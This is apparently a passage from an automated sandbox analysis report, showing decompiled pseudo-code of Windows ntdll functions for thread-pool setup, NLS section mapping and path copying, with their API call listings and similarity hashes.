ZwCreateSection.1105(?,000F0005,00000000,00000000,00000002,08000000,?,?,80100000,00000018,?,00000001,00000000,?,?,.nlp), ref: 6AC16490

Part of subcall function 6ABA99A0: LdrInitializeThunk.NTDLL(6ABF1A59,?,000F0007,?,?,00000004,08000000,00000000,00000065,00000000,00000000), ref: 6ABA99AA

ZwMapViewOfSection.1105(?,000000FF,00000000,00000000,00000000,00000000,?,00000001,00000000,00000002,?,000F0005,00000000,00000000,00000002,08000000), ref: 6AC164BB

Part of subcall function 6ABA9780: LdrInitializeThunk.NTDLL(6ABF1A79,?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000004,?,000F0007,?,?,00000004), ref: 6ABA978A

ZwClose.1105(?,?,000000FF,00000000,00000000,00000000,00000000,?,00000001,00000000,00000002,?,000F0005,00000000,00000000,00000002), ref: 6AC164C8
ZwClose.1105(?,?,80100000,00000018,?,00000001,00000000,?,?,.nlp,?,\SystemRoot\Globalization\,?,00000000,?), ref: 6AC164DA

Strings

.nlp, xrefs: 6AC163C0
\SystemRoot\Globalization\, xrefs: 6AC16388
@, xrefs: 6AC1641B

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseFileInitializeSectionThunk$CreateInformationInitOpenQueryStringUnicodeView
String ID: .nlp$@$\SystemRoot\Globalization\
API String ID: 4284092774-2934557456
Opcode ID: c7107e5134be84b5083e38c12fd906bcabe357e71596f2cb404cbfc49d1fffe9
Instruction ID: c03e6efd94460160bc9c091ebd470afcc5bd4bab5ddd61db2e31c74375b4d8db
Opcode Fuzzy Hash: c7107e5134be84b5083e38c12fd906bcabe357e71596f2cb404cbfc49d1fffe9
Instruction Fuzzy Hash: C4417171E4562C6BDB21DA14CCC8BDEB7B8EB44314F0141E5E908A7241EF759E84DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6AB937EB, Relevance: 15.3, APIs: 10, Instructions: 269
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E6AB937EB(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t98;
				intOrPtr _t102;
				char* _t113;
				signed short _t123;
				signed int _t124;
				signed int _t129;
				intOrPtr* _t133;
				intOrPtr* _t134;
				intOrPtr* _t135;
				intOrPtr* _t139;
				intOrPtr* _t141;
				long _t152;
				void* _t153;
				signed int _t154;
				signed int _t155;
				signed int _t157;
				signed int _t160;
				signed short _t163;
				signed short _t164;
				signed int _t173;
				intOrPtr* _t176;
				short _t178;
				intOrPtr _t179;
				intOrPtr* _t181;
				intOrPtr _t182;
				void* _t183;

				_push(0x50);
				_push(0x6ac3ff48);
				E6ABBD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t183 - 0x44)) = __ecx;
				 *((intOrPtr*)(_t183 - 0x1c)) = 0xc0000001;
				 *((intOrPtr*)(_t183 - 0x24)) = 0;
				 *((intOrPtr*)(__ecx)) = 0;
				 *(_t183 - 0x2c) = __edx & 0x00000001;
				_t98 =  *[fs:0x30];
				RtlImageNtHeader( *(_t98 + 8));
				if(_t98 == 0) {
					_t178 = 0xc000007b;
					L28:
					return E6ABBD0D1(_t178);
				}
				 *((intOrPtr*)(_t183 - 0x38)) =  *((intOrPtr*)(_t98 + 0x60));
				_t179 =  *((intOrPtr*)(_t98 + 0x64));
				 *((intOrPtr*)(_t183 - 0x30)) = _t179;
				_t102 =  *((intOrPtr*)( *[fs:0x30] + 0x208));
				if(_t102 != 0) {
					if(_t179 < _t102) {
						 *((intOrPtr*)(_t183 - 0x30)) = _t102;
					}
				}
				_t181 = RtlAllocateHeap( *( *[fs:0x30] + 0x18),  *0x6ac584c4 + 0x000c0000 | 0x00000008, 0x120);
				 *((intOrPtr*)(_t183 - 0x20)) = _t181;
				 *((intOrPtr*)(_t183 - 4)) = 0;
				 *((intOrPtr*)(_t183 - 0x40)) = 1;
				if(_t181 == 0) {
					L36:
					_t178 = 0xc0000017;
					 *((intOrPtr*)(_t183 - 0x1c)) = 0xc0000017;
					goto L24;
				} else {
					_t152 =  *0x6ac584c4 + 0xc0000;
					 *(_t183 - 0x48) = _t152;
					_t153 = RtlAllocateHeap( *( *[fs:0x30] + 0x18), _t152,  *0x6ac584c0 * 0x24);
					 *((intOrPtr*)(_t183 - 0x24)) = _t153;
					if(_t153 == 0) {
						_t178 = 0xc0000017;
						 *((intOrPtr*)(_t183 - 0x1c)) = 0xc0000017;
						_t181 =  *((intOrPtr*)(_t183 - 0x20));
						L24:
						 *((intOrPtr*)(_t183 - 4)) = 0xfffffffe;
						 *((intOrPtr*)(_t183 - 0x40)) = 0;
						E6AB93B5A(_t107, 0, _t178, _t181);
						if(_t178 < 0) {
							goto L28;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t183 - 0x44)))) = _t181;
						if(E6AB87D50() != 0) {
							_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							_t178 =  *((intOrPtr*)(_t183 - 0x1c));
							_t181 =  *((intOrPtr*)(_t183 - 0x20));
						} else {
							_t113 = 0x7ffe0386;
						}
						if( *_t113 != 0) {
							L32:
							E6AC38BB6(_t181);
						}
						goto L28;
					}
					_t154 = 0;
					 *(_t183 - 0x28) = 0;
					_t182 =  *((intOrPtr*)(_t183 - 0x20));
					_t173 =  *0x6ac584c0;
					while(_t154 < 3) {
						 *((intOrPtr*)(_t182 + 0x10 + _t154 * 4)) = _t173 * _t154 * 0xc +  *((intOrPtr*)(_t183 - 0x24));
						_t154 = _t154 + 1;
						 *(_t183 - 0x28) = _t154;
					}
					_t155 = 0;
					while(1) {
						 *(_t183 - 0x28) = _t155;
						if(_t155 >= _t173 * 3) {
							break;
						}
						_t141 = _t155 * 0xc +  *((intOrPtr*)(_t183 - 0x24));
						 *((intOrPtr*)(_t141 + 8)) = 0;
						 *((intOrPtr*)(_t141 + 4)) = _t141;
						 *_t141 = _t141;
						_t155 = _t155 + 1;
					}
					_t157 =  *0x6ac584c4 + 0xc0000;
					 *(_t183 - 0x4c) = _t157;
					_t107 = RtlAllocateHeap( *( *[fs:0x30] + 0x18), _t157 | 0x00000008, _t173 << 2);
					_t181 =  *((intOrPtr*)(_t183 - 0x20));
					 *(_t181 + 0x1c) = _t107;
					if(_t107 == 0) {
						goto L36;
					}
					_t160 =  *0x6ac584c4 + 0xc0000;
					 *(_t183 - 0x50) = _t160;
					_t107 = RtlAllocateHeap( *( *[fs:0x30] + 0x18), _t160 | 0x00000008,  *0x6ac584c0 * 0xc);
					_t181 =  *((intOrPtr*)(_t183 - 0x20));
					 *(_t181 + 0x20) = _t107;
					if(_t107 == 0) {
						goto L36;
					}
					_t123 =  *0x7ffe03c0;
					 *(_t183 - 0x34) = _t123;
					 *(_t183 - 0x54) = _t123;
					 *(_t181 + 0x100) = _t123;
					_t178 = E6AB93B7A(_t181);
					 *((intOrPtr*)(_t183 - 0x1c)) = _t178;
					if(_t178 < 0) {
						goto L24;
					}
					 *((intOrPtr*)(_t181 + 0x104)) = 0xfffffffe;
					 *(_t183 - 0x60) = 0;
					 *((intOrPtr*)(_t183 - 0x5c)) = 0;
					_t163 =  *(_t183 - 0x34);
					_t124 = _t163 & 0x0000ffff;
					 *(_t183 - 0x60) = _t124;
					 *(_t181 + 8) = _t124;
					 *((intOrPtr*)(_t181 + 0xc)) = 0;
					 *_t181 = 1;
					if(_t163 < 4) {
						_t164 = 4;
					} else {
						_t164 = _t163 + 1;
					}
					 *(_t183 - 0x34) = _t164;
					_t49 = _t181 + 0x28; // 0x28
					_push(_t164);
					_push(0);
					_push(0x1f0003);
					_t178 = E6ABA9F70();
					 *((intOrPtr*)(_t183 - 0x1c)) = _t178;
					if(_t178 < 0) {
						goto L24;
					} else {
						 *((intOrPtr*)(_t183 - 4)) = 1;
						 *((intOrPtr*)(_t183 - 0x3c)) = 1;
						_t129 =  *0x7ffe03c0 << 2;
						if(_t129 < 0x200) {
							_t129 = 0x200;
						}
						_t53 = _t181 + 0x24; // 0x24
						_push( *((intOrPtr*)(_t183 - 0x30)));
						_push( *((intOrPtr*)(_t183 - 0x38)));
						_push(_t129);
						_push(_t181);
						_push(0x6ab8c740);
						_push(0xffffffff);
						_push( *((intOrPtr*)(_t181 + 0x28)));
						_push(0);
						_push(0xf00ff);
						_t178 = E6ABAA160();
						 *((intOrPtr*)(_t183 - 0x1c)) = _t178;
						if(_t178 < 0) {
							L23:
							 *((intOrPtr*)(_t183 - 4)) = 0;
							 *((intOrPtr*)(_t183 - 0x3c)) = 0;
							_t107 = E6AB93B48(_t130, 0, _t178, _t181);
							goto L24;
						} else {
							if( *(_t183 - 0x2c) != 0) {
								_push(4);
								_push(_t183 - 0x2c);
								_push(0xd);
								_push( *((intOrPtr*)(_t181 + 0x24)));
								_t178 = E6ABAAE70();
								 *((intOrPtr*)(_t183 - 0x1c)) = _t178;
								if(_t178 < 0) {
									goto L23;
								}
								 *((short*)(_t181 + 0xe6)) =  *(_t183 - 0x2c);
							}
							 *((intOrPtr*)(_t181 + 0x2c)) = 0;
							 *((intOrPtr*)(_t181 + 0xe0)) = 0;
							 *((intOrPtr*)(_t181 + 0x110)) = 0;
							 *((short*)(_t181 + 0xe4)) = 0;
							_t63 = _t181 + 0x30; // 0x30
							_t133 = _t63;
							 *((intOrPtr*)(_t133 + 4)) = _t133;
							 *_t133 = _t133;
							_t65 = _t181 + 0x38; // 0x38
							_t134 = _t65;
							 *((intOrPtr*)(_t134 + 4)) = _t134;
							 *_t134 = _t134;
							_t67 = _t181 + 0x114; // 0x114
							_t135 = _t67;
							 *((intOrPtr*)(_t135 + 4)) = _t135;
							 *_t135 = _t135;
							E6AB8F194(_t181, _t183 - 0x58, 0);
							_t181 =  *((intOrPtr*)(_t183 - 0x20));
							 *((intOrPtr*)(_t181 + 0xf0)) =  *((intOrPtr*)(_t183 + 4));
							_t73 = _t181 + 0x40; // 0x40
							_t178 = E6AB9196E(_t73, _t181);
							 *((intOrPtr*)(_t183 - 0x1c)) = _t178;
							if(_t178 < 0) {
								goto L23;
							}
							_t178 = 0;
							 *((intOrPtr*)(_t183 - 0x1c)) = 0;
							E6AB82280(_t130, 0x6ac586b4);
							 *((intOrPtr*)(_t183 - 4)) = 2;
							_t77 = _t181 + 0xe8; // 0xe8
							_t139 = _t77;
							_t176 =  *0x6ac553dc; // 0x6ac553d8
							if( *_t176 != 0x6ac553d8) {
								_push(3);
								asm("int 0x29");
								goto L32;
							}
							 *_t139 = 0x6ac553d8;
							 *((intOrPtr*)(_t139 + 4)) = _t176;
							 *_t176 = _t139;
							 *0x6ac553dc = _t139;
							 *((intOrPtr*)(_t183 - 4)) = 1;
							_t130 = E6AB93B3D();
							goto L23;
						}
					}
				}
			}

0x6ab937eb
0x6ab937ed
0x6ab937f2
0x6ab937f7
0x6ab937fa
0x6ab93803
0x6ab93806
0x6ab9380b
0x6ab9380e
0x6ab93817
0x6ab9381e
0x6abd615c
0x6ab93b0c
0x6ab93b13
0x6ab93b13
0x6ab93827
0x6ab9382a
0x6ab9382d
0x6ab93836
0x6ab9383e
0x6abd6168
0x6abd616e
0x6abd616e
0x6abd6168
0x6ab93865
0x6ab93867
0x6ab9386a
0x6ab9386d
0x6ab93876
0x6abd6176
0x6abd6176
0x6abd617b
0x00000000
0x6ab9387c
0x6ab93882
0x6ab93888
0x6ab938a2
0x6ab938a4
0x6ab938a9
0x6abd6183
0x6abd6188
0x6abd618b
0x6ab93ad9
0x6ab93ad9
0x6ab93ae0
0x6ab93ae7
0x6ab93aee
0x00000000
0x00000000
0x6ab93af3
0x6ab93afc
0x6abd6288
0x6abd628d
0x6abd6290
0x6ab93b02
0x6ab93b02
0x6ab93b02
0x6ab93b0a
0x6ab93b71
0x6ab93b73
0x6ab93b73
0x00000000
0x6ab93b0a
0x6ab938af
0x6ab938b1
0x6ab938b4
0x6ab938b7
0x6ab938bd
0x6ab938cd
0x6ab938d1
0x6ab938d2
0x6ab938d2
0x6ab938d7
0x6ab938d9
0x6ab938d9
0x6ab938e1
0x00000000
0x00000000
0x6ab938e6
0x6ab938e9
0x6ab938ec
0x6ab938ef
0x6ab938f1
0x6ab938f1
0x6ab938fa
0x6ab93900
0x6ab93916
0x6ab9391b
0x6ab9391e
0x6ab93923
0x00000000
0x00000000
0x6ab9392f
0x6ab93935
0x6ab9394d
0x6ab93952
0x6ab93955
0x6ab9395a
0x00000000
0x00000000
0x6ab93960
0x6ab93965
0x6ab93968
0x6ab9396b
0x6ab93978
0x6ab9397a
0x6ab9397f
0x00000000
0x00000000
0x6ab93985
0x6ab9398f
0x6ab93992
0x6ab93995
0x6ab93998
0x6ab9399b
0x6ab9399e
0x6ab939a1
0x6ab939a4
0x6ab939ad
0x6abd6195
0x6ab939b3
0x6ab939b3
0x6ab939b3
0x6ab939b4
0x6ab939b7
0x6ab939ba
0x6ab939bb
0x6ab939bc
0x6ab939c7
0x6ab939c9
0x6ab939ce
0x00000000
0x6ab939d4
0x6ab939d7
0x6ab939da
0x6ab939e2
0x6ab939ec
0x6ab939ee
0x6ab939ee
0x6ab939f0
0x6ab939f3
0x6ab939f6
0x6ab939f9
0x6ab939fa
0x6ab939fb
0x6ab93a00
0x6ab93a02
0x6ab93a05
0x6ab93a06
0x6ab93a11
0x6ab93a13
0x6ab93a18
0x6ab93aca
0x6ab93aca
0x6ab93acd
0x6ab93ad4
0x00000000
0x6ab93a1e
0x6ab93a22
0x6ab93b14
0x6ab93b19
0x6ab93b1a
0x6ab93b1c
0x6ab93b24
0x6ab93b26
0x6ab93b2b
0x00000000
0x00000000
0x6ab93b31
0x6ab93b31
0x6ab93a28
0x6ab93a2b
0x6ab93a31
0x6ab93a37
0x6ab93a3e
0x6ab93a3e
0x6ab93a41
0x6ab93a44
0x6ab93a46
0x6ab93a46
0x6ab93a49
0x6ab93a4c
0x6ab93a4e
0x6ab93a4e
0x6ab93a54
0x6ab93a57
0x6ab93a5f
0x6ab93a67
0x6ab93a6a
0x6ab93a70
0x6ab93a7a
0x6ab93a7c
0x6ab93a81
0x00000000
0x00000000
0x6ab93a83
0x6ab93a85
0x6ab93a8d
0x6ab93a92
0x6ab93a99
0x6ab93a99
0x6ab93a9f
0x6ab93aac
0x6ab93b6c
0x6ab93b6f
0x00000000
0x6ab93b6f
0x6ab93ab2
0x6ab93ab4
0x6ab93ab7
0x6ab93ab9
0x6ab93abe
0x6ab93ac5
0x00000000
0x6ab93ac5
0x6ab93a18
0x6ab939ce

APIs

RtlImageNtHeader.1105(?,6AC3FF48,00000050,6AB93E98,?,6AB8F900,00000000,00000000,?,?,?,6AC3FEB8,0000001C,6AB62C4C,?), ref: 6AB93817

Part of subcall function 6AB7B060: RtlImageNtHeaderEx.1105(00000001,?,00000000,00000000,?,?,?,6AB9381C,?,6AC3FF48,00000050,6AB93E98,?,6AB8F900,00000000,00000000), ref: 6AB7B076

RtlAllocateHeap.1105(?,?,00000120,?,6AC3FF48,00000050,6AB93E98,?,6AB8F900,00000000,00000000,?,?,?,6AC3FEB8,0000001C), ref: 6AB93860
RtlAllocateHeap.1105(?,?,00000000,?,?,00000120,?,6AC3FF48,00000050,6AB93E98,?,6AB8F900,00000000,00000000), ref: 6AB9389D
RtlAllocateHeap.1105(?,?,?,?,?,00000000,?,?,00000120,?,6AC3FF48,00000050,6AB93E98,?,6AB8F900,00000000), ref: 6AB93916
RtlAllocateHeap.1105(?,?,00000000,?,?,?,?,?,00000000,?,?,00000120,?,6AC3FF48,00000050,6AB93E98), ref: 6AB9394D
ZwCreateIoCompletion.1105(00000028,001F0003,00000000,?), ref: 6AB939C2
ZwCreateWorkerFactory.1105(00000024,000F00FF,00000000,?,000000FF,6AB8C740,00000000,7FFE03C0,?,?,00000028,001F0003,00000000,?), ref: 6AB93A0C
RtlAcquireSRWLockExclusive.1105(6AC586B4,00000000,00000024,000F00FF,00000000,?,000000FF,6AB8C740,00000000,7FFE03C0,?,?,00000028,001F0003,00000000,?), ref: 6AB93A8D
RtlGetCurrentServiceSessionId.1105(?,?,00000000,?,?,?,?,?,00000000,?,?,00000120,?,6AC3FF48,00000050,6AB93E98), ref: 6AB93AF5
ZwSetInformationWorkerFactory.1105(?,0000000D,00000000,00000004,00000024,000F00FF,00000000,?,000000FF,6AB8C740,00000000,7FFE03C0,?,?,00000028,001F0003), ref: 6AB93B1F

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap$CreateFactoryHeaderImageWorker$AcquireCompletionCurrentExclusiveInformationLockServiceSession
String ID:
API String ID: 358453882-0
Opcode ID: 3f70cc8b2e2cd530ba2d27dcb4cf3b0fd1f47a1a7879eff8fdaa93859939bdf9
Instruction ID: 833268190abe5c1e6940a51f3eeabdd02efd67ddec6ee4cd067e5a5f0e59ba9c
Opcode Fuzzy Hash: 3f70cc8b2e2cd530ba2d27dcb4cf3b0fd1f47a1a7879eff8fdaa93859939bdf9
Instruction Fuzzy Hash: C5B156B19016899FCB15CFA8C990B9EBBF5FB49304F11402EE51AAB361DB349901EF50

Uniqueness

Uniqueness Score: -1.00%

Function 6AB8F86D, Relevance: 15.1, APIs: 10, Instructions: 124
threadmemoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E6AB8F86D(void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t31;
				signed int _t40;
				signed int _t45;
				signed int _t46;
				signed int _t48;
				signed int _t50;
				signed int _t53;
				intOrPtr _t60;
				signed int* _t66;
				signed int _t67;
				signed int* _t70;
				void* _t71;

				_t64 = __edx;
				_t61 = __ecx;
				_push(0x1c);
				_push(0x6ac3feb8);
				E6ABBD08C(__ebx, __edi, __esi);
				_t60 = __edx;
				 *((intOrPtr*)(_t71 - 0x28)) = __edx;
				_t70 = __ecx;
				 *((intOrPtr*)(_t71 - 0x2c)) = __ecx;
				_t66 =  *(_t71 + 8);
				if(_t66 == 0 || __ecx == 0 || __edx == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					E6AC388F5(_t60, _t61, _t64, _t66, _t70, __eflags);
					_t31 = 0xc000000d;
					goto L9;
				} else {
					if( *__ecx == 0) {
						L10:
						 *(_t71 - 0x20) =  *(_t71 - 0x20) & 0x00000000;
						_t67 = E6AB93E70(_t71 - 0x20, 0);
						 *(_t71 - 0x24) = _t67;
						__eflags = _t67;
						if(_t67 < 0) {
							L24:
							_t31 = _t67;
							L9:
							return E6ABBD0D1(_t31);
						}
						E6AB82280(_t36, _t60);
						 *(_t71 - 4) = 1;
						__eflags =  *_t70;
						if( *_t70 != 0) {
							asm("lock inc dword [eax]");
							L21:
							 *(_t71 - 4) = 0xfffffffe;
							E6AB8F9DD(_t60);
							_t40 =  *(_t71 - 0x20);
							__eflags = _t40;
							if(__eflags != 0) {
								_push(_t40);
								E6AB69100(_t60, _t61, _t67, _t70, __eflags);
							}
							__eflags = _t67;
							if(_t67 >= 0) {
								 *( *(_t71 + 8)) =  *_t70;
							}
							goto L24;
						}
						__eflags = _t70 - 0x6ac586c0;
						if(_t70 != 0x6ac586c0) {
							__eflags = _t70 - 0x6ac586b8;
							if(_t70 != 0x6ac586b8) {
								L20:
								 *_t70 =  *(_t71 - 0x20);
								_t20 = _t71 - 0x20;
								 *_t20 =  *(_t71 - 0x20) & 0x00000000;
								__eflags =  *_t20;
								goto L21;
							}
							E6AB95AA0(_t61,  *(_t71 - 0x20), 1);
							_t45 = E6AB695F0( *(_t71 - 0x20), 1);
							L27:
							_t67 = _t45;
							__eflags = _t67;
							 *(_t71 - 0x24) = _t67;
							if(_t67 >= 0) {
								goto L20;
							}
							goto L21;
						}
						_t46 =  *0x6ac58754;
						__eflags = _t46;
						if(_t46 != 0) {
							E6AB95AA0(_t61,  *(_t71 - 0x20), _t46);
						} else {
							_t50 =  *0x7ffe03c0 << 3;
							__eflags = _t50 - 0x300;
							if(_t50 < 0x300) {
								_t50 = 0x300;
							}
							E6AB95AA0(0x300,  *(_t71 - 0x20), _t50);
							_t53 =  *0x7ffe03c0 << 2;
							_t61 = 0x180;
							__eflags = _t53 - 0x180;
							if(_t53 < 0x180) {
								_t53 = 0x180;
							}
							E6ABA5C70( *(_t71 - 0x20), _t53);
						}
						_t48 =  *0x6ac58750;
						__eflags = _t48;
						if(_t48 != 0) {
							_t45 = E6AB6B8F0( *(_t71 - 0x20), _t48);
							goto L27;
						} else {
							goto L20;
						}
					}
					 *((char*)(_t71 - 0x19)) = 0;
					E6AB8FAD0(__edx);
					 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
					if( *_t70 != 0) {
						asm("lock inc dword [eax]");
						 *_t66 =  *_t70;
						 *((char*)(_t71 - 0x19)) = 1;
					}
					 *(_t71 - 4) = 0xfffffffe;
					E6AB8F9D6(_t60);
					if( *((char*)(_t71 - 0x19)) == 0) {
						goto L10;
					} else {
						_t31 = 0;
						goto L9;
					}
				}
			}

0x6ab8f86d
0x6ab8f86d
0x6ab8f86d
0x6ab8f86f
0x6ab8f874
0x6ab8f879
0x6ab8f87b
0x6ab8f87e
0x6ab8f880
0x6ab8f883
0x6ab8f888
0x6abd47c9
0x6abd47ce
0x00000000
0x6ab8f8b1
0x6ab8f8b4
0x6ab8f8f1
0x6ab8f8f1
0x6ab8f900
0x6ab8f902
0x6ab8f905
0x6ab8f907
0x6ab8f9a9
0x6ab8f9a9
0x6ab8f8e9
0x6ab8f8ee
0x6ab8f8ee
0x6ab8f90e
0x6ab8f913
0x6ab8f91c
0x6ab8f91e
0x6ab8f9e4
0x6ab8f98b
0x6ab8f98b
0x6ab8f992
0x6ab8f997
0x6ab8f99a
0x6ab8f99c
0x6ab8f9e9
0x6ab8f9ea
0x6ab8f9ea
0x6ab8f99e
0x6ab8f9a0
0x6ab8f9a7
0x6ab8f9a7
0x00000000
0x6ab8f9a0
0x6ab8f924
0x6ab8f92a
0x6ab8f9b0
0x6ab8f9b6
0x6ab8f982
0x6ab8f985
0x6ab8f987
0x6ab8f987
0x6ab8f987
0x00000000
0x6ab8f987
0x6ab8f9be
0x6ab8f9c6
0x6ab8f9cb
0x6ab8f9cb
0x6ab8f9cd
0x6ab8f9cf
0x6ab8f9d2
0x00000000
0x00000000
0x00000000
0x6ab8f9d4
0x6ab8f930
0x6ab8f935
0x6ab8f937
0x6abd47a3
0x6ab8f93d
0x6ab8f942
0x6ab8f94a
0x6ab8f94c
0x6ab8f94e
0x6ab8f94e
0x6ab8f954
0x6ab8f95e
0x6ab8f961
0x6ab8f966
0x6ab8f968
0x6ab8f96a
0x6ab8f96a
0x6ab8f970
0x6ab8f970
0x6ab8f975
0x6ab8f97a
0x6ab8f97c
0x6abd47b1
0x00000000
0x00000000
0x00000000
0x00000000
0x6ab8f97c
0x6ab8f8b6
0x6ab8f8bb
0x6ab8f8c0
0x6ab8f8c8
0x6ab8f8ca
0x6ab8f8cf
0x6ab8f8d1
0x6ab8f8d1
0x6ab8f8d5
0x6ab8f8dc
0x6ab8f8e5
0x00000000
0x6ab8f8e7
0x6ab8f8e7
0x00000000
0x6ab8f8e7
0x6ab8f8e5

APIs

RtlAcquireSRWLockShared.1105(?,?,?,?,6AC3FEB8,0000001C,6AB62C4C,?), ref: 6AB8F8BB
TpAllocPool.1105(00000000,00000000,?,?,?,6AC3FEB8,0000001C,6AB62C4C,?), ref: 6AB8F8FB
RtlAcquireSRWLockExclusive.1105(?,00000000,00000000,?,?,?,6AC3FEB8,0000001C,6AB62C4C,?), ref: 6AB8F90E
TpSetPoolMaxThreads.1105(00000000,7FFE03C0,?,00000000,00000000,?,?,?,6AC3FEB8,0000001C,6AB62C4C,?), ref: 6AB8F954
TpSetPoolMaxThreadsSoftLimit.1105(00000000,7FFE03C0,00000000,7FFE03C0,?,00000000,00000000,?,?,?,6AC3FEB8,0000001C,6AB62C4C,?), ref: 6AB8F970
TpSetPoolMaxThreads.1105(00000000,00000001,?,00000000,00000000,?,?,?,6AC3FEB8,0000001C,6AB62C4C,?), ref: 6AB8F9BE
TpSetPoolMinThreads.1105(00000000,00000001,00000000,00000001,?,00000000,00000000,?,?,?,6AC3FEB8,0000001C,6AB62C4C,?), ref: 6AB8F9C6

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Pool$Threads$AcquireLock$AllocExclusiveLimitSharedSoft
String ID:
API String ID: 4196657934-0
Opcode ID: 68ecc9e60199772b6f99b886dd144555289e5f3d8239b44a22fd94911a3f3813
Instruction ID: 1ee42e3739fb0fb4065c0216be4246c076d087b1d743c7a3b0b0376fce8bda35
Opcode Fuzzy Hash: 68ecc9e60199772b6f99b886dd144555289e5f3d8239b44a22fd94911a3f3813
Instruction Fuzzy Hash: EC41BDB1A01285EFEB119FBCC844BAEB7B5FF49718F120119E451E7252DF74C840AB65

Uniqueness

Uniqueness Score: -1.00%

Function 6AB65210, Relevance: 15.1, APIs: 10, Instructions: 107
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E6AB65210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				void* _t35;
				int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E6AB652A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *(_t31 + 0x28);
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *(_t61 + 0x10);
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E6ABA95D0();
							RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t61);
						}
					} else {
						E6AB7EB70(_t54, 0x6ac579a0);
					}
					return _t52 + 2;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E6ABA95D0();
								RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t61);
							}
						} else {
							E6AB7EB70(_t54, 0x6ac579a0);
						}
						return _t52;
					}
					L5:
					_t33 = memcpy(_a8, _t54, _t52);
					if(_t61 == 0) {
						E6AB7EB70(_t54, 0x6ac579a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E6ABA95D0();
							RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t35 + _t52)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x6ab65220
0x6ab65224
0x6abc0d13
0x6abc0d16
0x6abc0d19
0x6ab6522a
0x6ab6522a
0x6ab6522d
0x6ab6522d
0x6ab65231
0x6ab65235
0x6ab65239
0x6abc0d5c
0x6abc0d62
0x00000000
0x00000000
0x6abc0d6a
0x6abc0d7b
0x6abc0d7f
0x6abc0d81
0x6abc0d84
0x6abc0d95
0x6abc0d95
0x6abc0d6c
0x6abc0d71
0x6abc0d71
0x00000000
0x6ab6524a
0x6ab6524a
0x6ab65250
0x6abc0d24
0x6abc0d35
0x6abc0d39
0x6abc0d3b
0x6abc0d3e
0x6abc0d50
0x6abc0d50
0x6abc0d26
0x6abc0d2b
0x6abc0d2b
0x00000000
0x6abc0d55
0x6ab65256
0x6ab6525b
0x6ab65265
0x6abc0da7
0x6ab6526b
0x6ab6526e
0x6ab65272
0x6abc0db1
0x6abc0db4
0x6abc0dc5
0x6abc0dc5
0x6ab65272
0x6ab65278
0x6ab6527e
0x6ab6528a
0x6ab6528c
0x6ab6528d
0x00000000
0x6ab65280
0x6ab65282
0x6ab65288
0x6ab6529f
0x6ab65292
0x00000000
0x6ab65292
0x00000000
0x6ab65288
0x6ab6527e

APIs

